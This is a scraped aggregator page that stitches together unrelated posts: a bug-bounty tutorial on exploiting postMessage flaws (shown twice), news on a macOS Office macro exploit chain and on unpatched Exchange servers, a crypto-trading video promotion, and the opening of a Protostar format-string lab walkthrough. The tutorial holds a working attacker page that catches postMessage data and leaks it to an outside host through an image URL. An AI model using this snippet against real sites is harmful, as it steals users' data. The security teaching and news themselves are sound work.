Dock  Koelpin

Dock Koelpin

1599713760

How to spot and exploit postMessage vulnerablities?

Hey fam, i hope everyone is doing okay and able to use this time efficiently for self development and to self reflect. This corona virus pandemic has grown a bit tiring to be honest and gets the best of us.

Here is my attempt at helping you understand a bug often overlooked when checking webapps or mobile apps, making it a gold mine for all testers, whether seasoned or new.

Prerequisite: the site should rely on cookies

CASE 1, Message sent to all origin

First a little about postMessage, as descirbed in the mozilla documentation the syntax is fairly simple.

postMessage(message, targetOrigin, [transfer]);

The problem however occurs when the target origin is set to * aka everywhere or lets say to xyz.com but improper implentation allows one to bypass it by creating domain like _xyz.com_puter.com. As most of you must have guessed by now the data is not being restricted to the same origin(the original domain) and thus in theory can be leaked.

Lets take a closer look at how this can be achieved

<script>
window.addEventListener("message", function(event){
document.write("<img src='http://192.168.1.5:8000/?leak="+event.data.value+"'></img>");
}, false);
window.open("vulnerable page leaking data");
</script>

I know this must look kind of confusing at first look but stay with me:

Since the message is being sent to all origins, we should be able to catch it. So we created a malicious html page that has an event listener basically a kind of catcher that catches any data sent by post message.

#bugs #javascript #bug-bounty #web-development #hacking

What is GEEK

Buddha Community

How to spot and exploit postMessage vulnerablities?
Dock  Koelpin

Dock Koelpin

1599713760

How to spot and exploit postMessage vulnerablities?

Hey fam, i hope everyone is doing okay and able to use this time efficiently for self development and to self reflect. This corona virus pandemic has grown a bit tiring to be honest and gets the best of us.

Here is my attempt at helping you understand a bug often overlooked when checking webapps or mobile apps, making it a gold mine for all testers, whether seasoned or new.

Prerequisite: the site should rely on cookies

CASE 1, Message sent to all origin

First a little about postMessage, as descirbed in the mozilla documentation the syntax is fairly simple.

postMessage(message, targetOrigin, [transfer]);

The problem however occurs when the target origin is set to * aka everywhere or lets say to xyz.com but improper implentation allows one to bypass it by creating domain like _xyz.com_puter.com. As most of you must have guessed by now the data is not being restricted to the same origin(the original domain) and thus in theory can be leaked.

Lets take a closer look at how this can be achieved

<script>
window.addEventListener("message", function(event){
document.write("<img src='http://192.168.1.5:8000/?leak="+event.data.value+"'></img>");
}, false);
window.open("vulnerable page leaking data");
</script>

I know this must look kind of confusing at first look but stay with me:

Since the message is being sent to all origins, we should be able to catch it. So we created a malicious html page that has an event listener basically a kind of catcher that catches any data sent by post message.

#bugs #javascript #bug-bounty #web-development #hacking

Mikel  Okuneva

Mikel Okuneva

1597669200

Black Hat 2020: 'Zero-Click' MacOS Exploit Chain Uses Microsoft Office Macros

A new “zero-click” MacOS exploit chain could allow attackers to deliver malware to MacOS users using a Microsoft Office document with macros. The attack bypasses security measures that both Microsoft and Apple have put in place to protect MacOS users from malicious macros.

The exploit chain, revealed by Patrick Wardle, principal security researcher with Jamf, at Black Hat USA 2020, runs macros without an alert or prompt from the Microsoft Office application that prompts explicit user approval – meaning that when a user opens the document, the macro is automatically executed.

“As the current [macros-based] attacks are lame… I wanted to make them ‘better’ to raise awareness about this attack vector, and also highlight how it could easily be worse,” Wardle told Threatpost. “I found a sandbox escape and a bypass of Apple’s new notarization requirements, and combined that with another zero day (from another researcher) to make a full ‘zero-click’ exploit chain.”

Wardle notified both Microsoft and Apple about his findings. Apple patched the flaws with the release of MacOS 10.15.3, but told Wardle “this issue does not qualify for a CVE.” Microsoft meanwhile told Wardle that the exploit chain was an issue “on the Apple side.”

Current Macro-Based Attacks

A macro is a snippet of executable code that can be added to Microsoft Office documents, generally used to accomplish a task automatically. However, macros are also commonly abused by cybercriminals, who use them for delivering a malicious payload to the endpoint because they can be allowed with a simple, single mouse-click on the part of the user when prompted.

MacOS exploit chain

Credit: Patrick Wardle

Microsoft has attempted to block macros-based attacks. The tech giant has disabled them in Microsoft Office by default, so a user gets an alert if they are enabling macros. Microsoft also debuted a feature that sandboxed more recent versions of Microsoft Office applications that are running on modern versions of macOS – so even if (malicious) macros are inadvertently allowed to run, they will find themselves running in a highly restrictive sandbox.

From Apple’s end, the company has created notarization checks to prevent potentially malicious code – downloaded from the internet – from executing on MacOS systems. Notarizing is an automated system that scans software for malicious content and checks for code-signing issues. Due to these current protections, previous macros-based exploits have had little success.

However, Wardle’s exploit chain bypassed all of these security protections.

#black hat #mobile security #apple #black hat usa 2020 #cve-2019-1457 #exploit #exploit chain #macos #macros #macros attacks #microsoft #microsoft office #patrick wardle #vulnerability #zero-click

LAVERNE  CROOKS

LAVERNE CROOKS

1624554720

HOW TO TRADE SPOT AND FUTURES ON BINANCE. FOR BEGINNERS AND EXPERTS 1

HOW TO TRADE SPOT AND FUTURES ON BINANCE. FOR BEGINNERS AND EXPERTS 1

📺 The video in this post was made by LEARN EVERYTHING FOR FREE EFF DONVIP
️ The origin of the article: https://www.youtube.com/watch?v=OcWU2H1W5K0

🔺 DISCLAIMER: The article is for information sharing. The content of this video is solely the opinions of the speaker who is not a licensed financial advisor or registered investment advisor. Not investment advice or legal advice.
Cryptocurrency trading is VERY risky. Make sure you understand these risks and that you are responsible for what you do with your money
🔥 If you’re a beginner. I believe the article below will be useful to you ☞ What You Should Know Before Investing in Cryptocurrency - For Beginner
⭐ ⭐ ⭐The project is of interest to the community. Join to Get free ‘GEEK coin’ (GEEKCASH coin)!
⭐ ⭐ ⭐ Join to Get free ‘GEEK coin’ (GEEKCASH coin)! ☞ https://geekcash.org⭐ ⭐ ⭐
Thanks for visiting and watching! Please don’t forget to leave a like, comment and share!

#what is spot #spot and futures #futures #bitcoin #blockchain

Microsoft Exchange Servers Still Open to Actively Exploited Flaw

Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges – even eight months after Microsoft issued a fix.

The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft’s February Patch Tuesday updates – and admins in March were warned that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.

However, new telemetry found that out of 433,464 internet-facing Exchange servers observed, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers are still vulnerable to the flaw.

“There are two important efforts that Exchange administrators and infosec teams need to undertake: verifying deployment of the update and checking for signs of compromise,” said Tom Sellers with Rapid7 in a Tuesday analysis.

Researchers warned in a March advisory that unpatched servers are being exploited in the wild by unnamed APT actors. Attacks first started in late February and targeted “numerous affected organizations,” researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks, post-exploitation.

Previously, in April, Rapid7 researchers found that more than 80 percent of servers were vulnerable; out of 433,464 internet-facing Exchange servers observed, at least 357,629 were open to the flaw (as of March 24). Researchers used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw.

#hacks #vulnerabilities #web security #active exploit #cve-2020-0688 #exchange servers #exploitation #microsoft #microsoft exchange #remote code execution #unpatched servers #vulnerability

[ExpDev] Exploit Exercise | Protostar | Format 4

The goal of this challenge is to redirect our execution flow to print the winning statement by leveraging a Global Offset Table (“GOT”) instead of the return pointers that we used for previous Format String vulnerability challenges. Let’s see how we can do this :)
Image for post

Things to note

  • **char buffer[512]**: Setting the buffer size to 512.
  • **fgets(buffer, sizeof(buffer), stdin)**: Getting a user supplied-input. And it limits the buffer size to size of the buffer, which is 512. We can max input with 511 bytes because C always add 0x00 at the end of the string as a terminator.
  • **printf(buffer);**: This is the vulnerable function in this code. The printf() will not check whether the supplied inputs expected format strings or not since it is coded to accept any string values. So what we can do is simply to verify if we can leak the memory addresses and also write arbitrary code onto the stack ([READ] %p or %x → [WRITE] %n).
  • **exit(1);**: The exit(1) is a syscall, and it simply exits the program. Unlike previous exercises, we do not have any return addresses after the printf(); instead, we have this exit(1). But what we can do is since the exit(1) is a part of the Global Offset Table (“GOT”), we can overwrite its entry point for the exit(1) function with the address for hello() to print out the winning statement.

What is GOT?

Image for post

Source: https://ctf101.org/binary-exploitation/what-is-the-got/

Simply put, GOT helps load shared library functions (e.g., exit()) in a dynamically-linked ELF binary. Basically, one can create their program without re-writing popular functions like exit(); instead, they can add pointers to call those functions as that they can be dynamically loaded at the run time. Example ASM file below:

Image for post


Disassemble (GDB)

Let’s disassemble the binary to see what is doing at the ASM-level.

$ gdb -q /opt/protostar/bin/format4
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) set disassembly-flavor intel 
(gdb) disassemble vuln

Image for post<

As we examined from the source code perspective, the program itself is pretty simple. We just need to note the entry address of the exit() function (0x8049724) right now.

#format-string-exploit #protostar-walkthrough #exploit-exercise-format4 #format4-solution #protostart-format4 #string